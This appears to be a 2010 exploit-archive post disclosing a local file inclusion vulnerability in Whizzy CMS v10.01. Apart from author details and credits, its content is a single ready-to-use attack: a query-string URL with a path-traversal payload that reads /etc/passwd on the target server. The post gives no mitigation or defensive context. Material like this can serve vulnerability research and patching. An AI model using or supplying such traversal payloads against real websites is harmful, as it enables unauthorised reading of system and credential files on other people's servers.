[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Whizzy CMS v10.01 Local File Inclusion Vulnerability
# Published : 2010-07-15
# Author : Anarchy Angel
# Previous Title : RedShop 1.0.23.1 Joomla Component Blind SQL Injection Vulnerability
# Next Title : eXtreme Message Board 1.9.11 Multiple CSRF Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Local File Inclusion
[x] Vendor: Unverse.net
[x] Script Name: Whizzy CMS
[x] Script version: 10.01
[x] Author: Anarchy Angel
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://site.org/?[LFI]
Ex:
http://site.org/?../../../../../../../etc/passwd
Special Tnx : lun0s, proge, sToRm, progenic, gny